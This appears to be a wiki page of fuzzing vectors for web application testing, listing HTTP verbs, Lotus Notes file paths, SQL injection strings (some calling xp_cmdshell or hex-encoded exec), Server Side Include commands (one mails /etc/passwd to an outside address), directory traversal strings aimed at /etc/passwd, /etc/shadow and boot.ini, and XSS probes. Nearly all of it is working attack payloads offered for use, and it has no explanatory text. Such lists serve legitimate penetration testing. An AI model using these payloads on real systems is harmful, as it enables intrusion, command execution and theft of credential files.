=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
